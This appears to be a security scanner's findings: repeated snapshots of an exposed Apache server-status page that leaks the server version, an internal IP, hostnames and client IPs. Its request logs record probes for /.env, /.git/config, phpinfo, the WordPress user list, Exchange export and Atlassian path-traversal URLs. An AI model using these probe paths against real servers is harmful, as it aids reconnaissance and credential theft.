34.54000.07.15858.15 96.7.74.198http/1.1localhost:80GET /.git/config HTTP/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.864</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d320db3092db
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:25 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 26 seconds Server load: 0.24 0.20 0.23 Total accesses: 8186296 - Total Traffic: 207.0 GB CPU Usage: u1337.56 s208.75 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 12 requests currently being processed, 186 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no6yes216040 123840no4yes315001 286508no2yes216000 3109764no0yes018000 4116801no2yes117000 533086no1yes117000 621767no4yes216010 7125209no0yes018000 8115169no0yes018000 943856no0yes018000 10129613no2yes117010 Sum11021 12186061 __________W______W_W______R________W_R______R___________________ ______________W__________________W____________R_W_______________ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/211/40347_ 17.93000.03.69868.70 96.7.74.175http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/248/40342_ 17.93000.03.87867.78 96.7.74.198http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0987300/260/40556_ 17.92200.02.13988.51 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/224/40520_ 17.92200.01.22854.96 96.7.74.175http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0987300/227/40326_ 17.93000.01.14924.77 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/246/40608_ 17.92200.04.53963.21 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/246/40597_ 17.92200.04.03887.13 96.7.74.175http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0987300/250/40503_ 17.93000.01.43781.01 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/240/40607_ 17.940120.03.95985.87 96.7.74.175http/1.1trmm.us:80GET /server-status HTTP/1.1 0-0987300/223/40496_ 17.92000.01.25830.92 96.7.74.198http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0987300/243/40326W 17.111800.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/221/40298_ 17.92200.01.11835.96 96.7.74.198http/1.1crm.textripple.com:443GET /tmp/.DS_Store HTTP/1.1 0-0987300/217/40505_ 17.922810.01.55867.49 23.223.149.133http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0987300/239/40375_ 17.93000.01.45907.11 96.7.74.175http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0987300/229/40491_ 17.92200.01.16854.63 96.7.74.175http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0987300/228/40500_ 17.95000.03.95940.81 96.7.74.175http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/234/40613_ 17.93000.04.05843.94 96.7.74.198http/1.1localhost:80GET /.env HTTP/1.1 0-0987300/213/40450W 17.91000.04.02869.37 96.7.74.175http/1.1localhost:80GET /server-status HTTP/1.1 1-0238400/573/38292_ 101.89400.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079W 101.61100.07.84873.27 174.240.149.27http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0238400/556/38211_ 101.85400.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.834120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54420.011.57932.12 96.7.74.175http/1.1 1-0238400/559/38023_ 102.002160.07.38887.80 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/561/38116_ 101.58400.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.624850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55514710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.534280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.504120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84400.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.814140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46410.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85400.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.993210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87400.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462700.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43400.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29500.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.404110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31400.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.144190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20410.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.814140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.934180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.644170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.164140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.104150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20410.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.084269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86400.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d3204c3610b4
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:19 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 58 seconds Server load: 0.24 0.40 0.52 Total accesses: 20259942 - Total Traffic: 725.4 GB CPU Usage: u3381.21 s368.71 cu0 cs0 - .0604% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 24 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no21yes7110141 194454no6yes117002 251755no3yes018012 3112428no19yes5130150 461164no4yes117003 546522no2yes018000 6125153no5yes216030 7110199no1yes117000 899710no15yes4140120 9100664no6yes216021 1085785no4yes117040 Sum11086 241740519 _____RR__R__W__RRR________________R_____________________R_W_____ ____RRR__________R____________________________________R___R___R_ ___________________RRR__________W______________RR_______________ W_____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002_ 34.08000.09.003072.14 2.18.255.105http/1.1 0-0404470/389/94024_ 34.78000.08.103027.17 2.18.255.73http/1.1localhost:80GET /.DS_Store HTTP/1.1 0-0404470/384/93840_ 34.78000.04.113042.70 2.18.255.73http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/378/93647_ 34.79000.09.853106.89 2.18.255.73http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0404470/393/93882_ 34.42010.05.439251.75 2.18.255.73http/1.1 0-0404470/381/93697R 34.78000.07.333136.41 2.18.255.105http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/368/93814R 34.78000.03.263033.51 2.18.255.105http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-0404470/380/93921_ 34.1701200.02.573105.31 2.18.255.105http/1.1 0-0404470/382/93925_ 34.79000.05.553111.34 2.18.255.73http/1.1localhost:80GET / HTTP/1.1 0-0404470/389/93742R 33.910170.017.613204.24 2.18.255.105http/1.1 0-0404470/392/93852_ 34.79000.014.032995.42 2.18.255.105http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/370/93883_ 34.29010.010.282985.04 2.18.255.73http/1.1 0-0404470/388/93865_ 34.80000.05.053027.46 2.18.255.105http/1.1localhost:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/397/93662_ 34.79000.05.003032.88 2.18.255.73http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0404470/389/93928_ 34.79000.011.862988.44 2.18.255.105http/1.1localhost:80GET /info.php HTTP/1.1 0-0404470/384/93625R 33.93000.04.873182.69 2.18.255.105http/1.1 0-0404470/390/93795R 34.78000.06.803015.32 2.18.255.105http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0404470/381/93872R 34.78000.09.423060.00 2.18.255.73http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864_ 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.73http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.73http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.73http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.761150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.851180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.56http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28000.035.343287.32 2.18.255.105http/1.1 2-0517550/858/103204_ 130.960730.024.213330.72 2.18.255.73http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.960690.025.363188.87 2.18.255.73http/1.1 2-0517550/830/102752_ 131.43000.018.393309.79 2.18.255.105http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0517550/851/102709_ 131.15090.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.090110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0702630.016.443323.71 2.18.255.73http/1.1 2-0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d32065ca06a7
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:19 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 58 seconds Server load: 0.24 0.40 0.52 Total accesses: 20259873 - Total Traffic: 725.4 GB CPU Usage: u3380.29 s368.57 cu0 cs0 - .0604% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 25 requests currently being processed, 173 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no3yes414011 194454no4yes216002 251755no2yes117002 3112428no6yes612020 461164no3yes117003 546522no0yes018000 6125153no3yes315030 7110199no1yes117000 899710no0yes117000 9100664no9yes513021 1085785no1yes117000 Sum11032 25173089 __R_______R__RR________R__________R____________R________________ __RRRRRW__________R__________________________W____RR__________R_ ___________________R______________R__R__R___RR__________R_______ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002_ 34.08000.09.003072.14 2.18.255.73http/1.1 0-0404470/388/94023_ 34.75000.08.103027.16 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0404470/382/93838R 34.15020.04.113042.70 188.166.147.46http/1.1client.simplismarter.com:443 0-0404470/376/93645_ 34.69000.09.853106.89 2.18.255.73http/1.1 0-0404470/393/93882_ 34.42010.05.439251.75 2.18.255.105http/1.1 0-0404470/380/93696_ 34.74010.07.333136.40 2.18.255.105http/1.1trmm.us:80GET / HTTP/1.1 0-0404470/366/93812_ 34.19000.03.263033.51 2.18.255.105http/1.1 0-0404470/380/93921_ 34.1701200.02.573105.31 2.18.255.105http/1.1 0-0404470/381/93924_ 34.1701120.05.553111.34 2.18.255.105http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.105http/1.1 0-0404470/391/93851R 34.06000.014.032995.42 2.18.255.73http/1.1 0-0404470/370/93883_ 34.29010.010.282985.04 2.18.255.73http/1.1 0-0404470/386/93863_ 34.37000.05.053027.46 2.18.255.105http/1.1 0-0404470/396/93661R 34.33020.05.003032.88 2.18.255.105http/1.1 0-0404470/388/93927R 34.050210.011.862988.44 2.18.255.73http/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 2.18.255.73http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.105http/1.1 0-0404470/380/93871_ 34.61000.09.423060.00 2.18.255.105http/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770_ 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864_ 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725R 86.490150.015.713139.65 2.18.255.105http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.105http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.73http/1.1 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.761150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.850180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.571170.028.383393.79 2.18.255.56http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28100.035.343287.32 188.166.147.46http/1.1client.simplismarter.com:443GET /includes/.DS_Store HTTP/1.1 2-0517550/858/103204_ 130.961730.024.213330.72 2.18.255.105http/1.1 2-0517550/833/102666_ 131.14000.033.373174.36 2.18.255.73http/1.1 2-0517550/844/103060_ 130.961690.025.363188.87 2.18.255.105http/1.1 2-0517550/829/102751_ 131.001790.018.393309.79 2.18.255.105http/1.1 2-0517550/851/102709R 131.15190.035.193309.72 2.18.255.73http/1.1 2-0517550/830/102524_ 131.10000.020.519564.19 2.18.255.105http/1.1 2-0517550/850/102897_ 131.090110.024.783478.47 2.18.255.105http/1.1 2-0517550/828/102743_ 131.0702630.016.443323.71 2.18.255.73http/1.1 2-0517550/835/102501_ 131.070750.019.023187.48 2.18.255.73http/1.1 2-0517550/842/102544_ 131.14000.021.003235.06 2.18.255.105http/1.1 2-0517550/816
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d32035d7195b
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911893 - Total Traffic: 388.3 GB CPU Usage: u2713.54 s281.25 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 24 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no23yes990151 1111644no13yes216065 222903no2yes117020 3107167no4yes216040 4112229no2yes117020 5121144no3yes018030 667151no11yes117065 918565no1yes018010 1136524no7yes612070 1436768no0yes216000 1542031no4yes018040 Sum11070 2417405011 RRRR__R_R_R____R_R________W_R________________R________W_________ ___W__________R_________________________________________W_____.. ..................................__________________............ ......R__RRR_______RR___....................................__R_ _____R__________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447R 0.36000.00.001872.59 95.101.88.100http/1.1 0-0192160/1/54507R 0.17200.00.001628.05 73.18.195.9http/1.1 0-0192160/3/54368R 0.38000.00.001762.17 95.101.88.100http/1.1 0-0192160/5/54408R 0.44000.00.031798.24 95.101.88.126http/1.1 0-0192160/3/54477_ 0.49010.00.011693.14 164.92.240.121http/1.1client.simplismarter.com:443GET /mms/.DS_Store HTTP/1.1 0-0192160/3/54343R 0.46000.00.001621.91 95.101.88.126http/1.1 0-0192160/5/54725R 0.48000.00.011745.05 95.101.88.100http/1.1trmm.us:80GET /config.json HTTP/1.1 0-0192160/4/54375_ 0.51000.00.001721.30 95.101.88.100http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0192160/3/54494R 0.40000.00.011605.35 95.101.88.126http/1.1 0-0192160/2/54385_ 0.37000.00.001718.61 95.101.88.45http/1.1 0-0192160/2/54486R 0.48000.00.001766.88 95.101.88.100http/1.1localhost:80GET / HTTP/1.1 0-0192160/6/54381_ 0.51000.00.011645.23 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/1/54319_ 0.37000.00.001768.49 95.101.88.100http/1.1 0-0192160/1/54534_ 0.37000.00.001721.76 95.101.88.100http/1.1 0-0192160/1/54342_ 0.37000.00.001737.58 95.101.88.126http/1.1 0-0192160/1/54403R 0.43000.00.001704.83 95.101.88.100http/1.1 0-0192160/4/54450_ 0.510620.00.041695.85 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0192160/3/54334R 0.44000.00.001783.77 95.101.88.126http/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.100http/1.1 1-01116440/251/55319_ 22.99000.012.701702.85 95.101.88.126http/1.1crm.sprout.online:80GET /telescope/requests HTTP/1.1 1-01116440/250/55455_ 22.99010.07.411705.27 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/256/55495_ 23.010600.01.571725.63 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 1-01116440/240/55541_ 23.04000.010.151685.08 95.101.88.126http/1.1localhost:80GET / HTTP/1.1 1-01116440/232/55681_ 22.99000.09.711649.16 95.101.88.126http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/246/55839W 22.98000.02.761730.21 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.100http/1.1 1-01116440/244/55678R 22.90000.06.967903.59 95.101.88.100http/1.1 1-01116440/253/55419_ 23.01000.04.231690.69 95.101.88.100http/1.1trmm.us:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/243/55453_ 22.96000.09.401606.63 95.101.88.126http/1.1 1-01116440/238/55365_ 22.96000.09.541786.53 95.101.88.100http/1.1 1-01116440/235/55277_ 23.020490.04.191645.66 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 1-01116440/247/55604_ 22.91000.013.021701.07 95.101.88.126http/1.1 1-01116440/245/55294_ 22.96000.01.661699.34 95.101.88.100http/1.1 1-01116440/237/55351_ 23.02000.08.211679.77 95.101.88.126http/1.1localhost:80GET /config.json HTTP/1.1 2-0229030/822/59596_ 109.93210.036.611946.19 95.101.88.100http/1.1 2-0229030/860/59772_ 110.15000.045.221932.58 95.101.88.126http/1.1localhost:80GET /login.action HTTP/1.1 2-0229030/823/59554_ 110.08200.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/859/60104_ 110.14000.049.341712.93 95.101.88.126http/1.1localhost:80GET /.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 95.101.88.126http/1.1 2-0229030/820/59820_ 110.16000.045.341928.60 95.101.88.100http/1.1trmm.us:80GET /.DS_Store HTTP/1.1 2-0229030/839/59997_ 109.810170.045.231876.02 95.101.88.45http/1.1 2-0229030/842/59781_ 109.96010.048.081881.13 95.101.88.100http/1.1 2-0229030/812/59781_ 110.16000.062.191860.43 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 2-0229030/837/59810R 110.01300.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91000.054.491908.23 95.101.88.100http/1.1 2-0229030/863/59893_ 110.16010.030.271826.50 95.101.88.126http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59582_ 109.820190.039.921824.04 95.101.88.126http/1.1 2-0229030/845/60028_ 110.160
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb314f00d3204f00d32006398657
Apache Status Apache Server Status for lowandtritt.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:48 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 42 seconds Server load: 0.53 1.12 0.95 Total accesses: 11911843 - Total Traffic: 388.3 GB CPU Usage: u2713.26 s281.22 cu0 cs0 - .0804% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 13 requests currently being processed, 185 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no25yes7110170 1111644no18yes2160105 222903no2yes018020 3107167no4yes018040 4112229no3yes018020 5121144no3yes018030 667151no11yes018074 918565no1yes018010 1136524no7yes216070 1436768no1yes117000 1542031no5yes117040 Sum11080 131850579 _R___R__RRR_RR_________W_________R______________________________ ______________________________________________________________.. ..................................__________________............ ......______W_W_________....................................____ _______R____________________R___................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/1/54447_ 0.36000.00.001872.59 95.101.88.126http/1.1 0-0192160/1/54507R 0.17200.00.001628.05 73.18.195.9http/1.1 0-0192160/3/54368_ 0.38000.00.001762.17 95.101.88.100http/1.1 0-0192160/4/54407_ 0.43000.00.031798.24 95.101.88.100http/1.1crm.sprout.online:80GET / HTTP/1.1 0-0192160/2/54476_ 0.29000.00.001693.14 95.101.88.126http/1.1 0-0192160/2/54342R 0.37000.00.001621.91 164.92.240.121http/1.1client.simplismarter.com:443 0-0192160/3/54723_ 0.330170.00.011745.05 95.101.88.126http/1.1 0-0192160/2/54373_ 0.40000.00.001721.29 95.101.88.100http/1.1 0-0192160/3/54494R 0.40000.00.011605.35 95.101.88.100http/1.1localhost:80GET /config.json HTTP/1.1 0-0192160/2/54385R 0.37000.00.001718.61 95.101.88.126http/1.1 0-0192160/1/54485R 0.37000.00.001766.88 95.101.88.100http/1.1 0-0192160/2/54377_ 0.37000.00.001645.23 95.101.88.126http/1.1 0-0192160/1/54319R 0.37000.00.001768.49 95.101.88.126http/1.1 0-0192160/1/54534R 0.37000.00.001721.76 95.101.88.100http/1.1 0-0192160/1/54342_ 0.37000.00.001737.58 95.101.88.126http/1.1 0-0192160/1/54403_ 0.43000.00.001704.83 95.101.88.126http/1.1localhost:80GET /.env HTTP/1.1 0-0192160/3/54449_ 0.43000.00.041695.85 95.101.88.100http/1.1localhost:80GET /.git/config HTTP/1.1 0-0192160/2/54333_ 0.38000.00.001783.77 95.101.88.45http/1.1 1-01116440/252/55617_ 22.93000.013.161759.70 95.101.88.126http/1.1 1-01116440/250/55318_ 22.96000.012.701702.85 95.101.88.126http/1.1localhost:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/250/55455_ 22.99010.07.411705.27 95.101.88.100http/1.1localhost:80GET /.env HTTP/1.1 1-01116440/228/55469_ 22.93000.07.371786.49 95.101.88.100http/1.1 1-01116440/231/55425_ 22.93000.06.757937.64 95.101.88.100http/1.1 1-01116440/255/55494W 22.91000.01.541725.60 95.101.88.126http/1.1localhost:80GET /info.php HTTP/1.1 1-01116440/239/55540_ 22.98000.010.151685.08 95.101.88.100http/1.1localhost:80GET /s/32332e33362e3136322e3733/_/;/META-INF/maven/com.atlassia 1-01116440/231/55680_ 22.91000.09.701649.16 95.101.88.100http/1.1 1-01116440/246/55839_ 22.98010.02.761730.21 95.101.88.100http/1.1trmm.us:80GET / HTTP/1.1 1-01116440/240/55605_ 22.95000.04.121667.85 95.101.88.126http/1.1crm.sprout.online:80GET /server-status HTTP/1.1 1-01116440/244/55678_ 22.90000.06.967903.59 